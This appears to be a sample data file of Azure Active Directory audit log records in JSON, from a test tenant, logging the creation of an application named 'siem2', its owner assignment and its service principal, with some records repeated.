-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "AvailableToOtherTenants", "OldValue": "[]", "NewValue": "[\r\n  false\r\n]"}, {"NewValue": "[\r\n  \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "AppId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n  false\r\n]", "OldValue": "[]", "Name": "AvailableToOtherTenants"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"Name": "RequiredResourceAccess", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n    \"RequiredAppPermissions\": [\r\n      {\r\n        \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n        \"DirectAccessGrant\": false,\r\n        \"ImpersonationAccessGrants\": [\r\n          20\r\n        ]\r\n      }\r\n    ],\r\n    \"EncodingVersion\": 1\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AppId\",\"AvailableToOtherTenants\",\"DisplayName\",\"RequiredResourceAccess\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.6833528Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554400"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add application.", "Id": "689aaff0-b34f-4077-9244-0563b9f9c03b"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:30", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}, {"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}], "ObjectId": "asr@testsiem.onmicrosoft.com", "ModifiedProperties": [{"Name": "Application.ObjectID", "OldValue": "", "NewValue": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "Application.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "Application.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "targetPUID", "Value": "1003200096971F55"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"Application.ObjectID\",\"Application.DisplayName\",\"Application.AppId\"]"}, {"Name": "correlationId", "Value": "484659af-7387-4b77-b889-c4d2a8060004"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"Application\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:30.7383513Z"}, {"Name": "env_epoch", "Value": "SDA9U"}, {"Name": "env_seqNum", "Value": "41554439"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR521"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add owner to application.", "Id": "ccbe264f-f6bc-42bd-b5b6-2893ce2f465f"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "AccountEnabled", "OldValue": "[]", "NewValue": "[\r\n  true\r\n]"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "AccountEnabled", "OldValue": "[]", "NewValue": "[\r\n  true\r\n]"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n  \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]", "OldValue": "[]", "Name": "Credential"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "[\r\n  true\r\n]", "OldValue": "[]", "Name": "AccountEnabled"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "DisplayName", "OldValue": "[]", "NewValue": "[\r\n  \"siem2\"\r\n]"}, {"Name": "ServicePrincipalName", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", 